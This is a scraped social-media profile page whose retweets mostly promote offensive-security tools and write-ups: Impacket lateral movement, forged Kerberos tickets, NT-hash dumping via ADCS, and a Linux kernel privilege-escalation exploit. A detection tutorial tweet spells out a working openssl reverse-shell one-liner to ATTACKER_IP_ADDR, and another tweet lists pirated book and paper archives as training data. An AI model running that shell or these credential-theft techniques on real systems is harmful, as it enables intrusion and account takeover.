L

255 posts

L

L

@ldrloaddll

f.

Katılım Ağustos 2021
620 Takip Edilen4 Takipçiler
L retweetledi
Sandfly Security
Sandfly Security@SandflySecurity·
We're going to show you how to detect someone using the openssl binary on Linux as an encrypted backdoor for a living off the land technique: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect ATTACKER_IP_ADDR:443 > /tmp/s; rm /tmp/s
Sandfly Security tweet media
English
4
69
454
77.8K
L retweetledi
Yam Peleg
Yam Peleg@Yampeleg·
542.8 TB of high quality text: LibGen RS - 72.8 TB - 6,738,687 txt files Link: annas-archive.org/datasets/libge… Sci-Hub - 87.2 TB - 97,847,479 txt files Link: annas-archive.org/datasets/scihub LibGen IL - 208.1 TB - 16,291,414 txt files Link: annas-archive.org/datasets/libge… Z-Library - 98.8 TB - 14,075,670 txt files Links: annas-archive.org/datasets/zlib Internet Archive Controlled Digital Lending - 220.4 TB - 7,919,904 txt files Link: annas-archive.org/datasets/ia Total: 542.8 TB 125,840,230 txt files Sponsors? (DM)
English
97
1K
5.8K
919.4K
L retweetledi
TrustedSec
TrustedSec@TrustedSec·
In our latest #blog, Principal Security Consultant @_xpn_ discusses some of the post-exploitation techniques he finds useful in cloud environments, specifically #Okta. Read it now! hubs.la/Q022wWkX0
English
2
51
96
14K
L retweetledi
GuidedHacking
GuidedHacking@GuidedHacking·
We are still looking to hire an extremely motivated reverse engineer to replace me as the main content creator of GH. You must be able to generate significant traffic and content at scale, ideally you would already have a YT channel which gets 10k+ view per video. GH has unlimited potential, we just need someone to tap into what we have already built. I've been doing this for a decade and I want to move on with my life.
English
0
14
87
19.6K
L retweetledi
an0n
an0n@an0n_r0·
remote controlling windows services (useful for rce/lateral movement) is possible not only by interacting with SMB (445) but by calling MSRPC (135+49679) also. added (fixed?) the MSRPC version in the services[.]py example for impacket, here it is: github.com/tothi/impacket…
an0n tweet media
English
2
145
417
0
L retweetledi
sn🥶vvcr💥sh
sn🥶vvcr💥sh@snovvcrash·
🧵 (1/) Forged Tickets Thread Golden 🔑 tickets are no longer in fashion, so here’s a short memo on using Diamond 💎 (@exploitph) and Sapphire (@_nwodtuhs) tickets with ticketer[.]py from #Impacket. At first let’s recap what we already know about Golden tickets ⤵️ #ad #kerberos
English
11
195
510
0
L retweetledi
mpgn
mpgn@mpgn_x64·
Dumping LSASS is such a 2020 move, let me introduce a new CrackMapExec module called Masky developed by @_ZakSec 🎉 If you have admin privilege, the module will impersonate all users connected -> ask a certificate (ADCS) -> retrieve the NT hash using PKINIT 🚀 Crazy module 🪂
mpgn tweet media
English
25
487
1.6K
0
L retweetledi
x86matthew
x86matthew@x86matthew·
SharedMemUtils - A simple tool to automatically find vulnerabilities in shared memory objects (commonly used for IPC in Windows services) This tool immediately uncovered potential exploitation routes in both Nvidia and Dell Audio services on my system. x86matthew.com/view_post?id=s…
x86matthew tweet media
English
9
248
785
0
L retweetledi
Theori
Theori@theori_io·
Our intern @_qwerty_po was destined to analyze a recent Linux kernel LPE vuln (CVE-2022-32250), a bug found and reported by @FidgetingBits. Here's a brief write-up on the analysis of the bug and the exploit development. Check it out! blog.theori.io/research/CVE-2… (exploit included)
English
2
101
243
0
L retweetledi
Zak
Zak@_ZakSec·
If you're interested by an alternative way to dump domain users' NT hashes and TGT without touching LSASS, take a look at the new Masky tool :) Everything is explained in this article: z4ksec.github.io/posts/masky-re… Thanks @harmj0y, @tifkin_ and @ly4k_ for their amazing work on ADCS!
English
19
344
854
0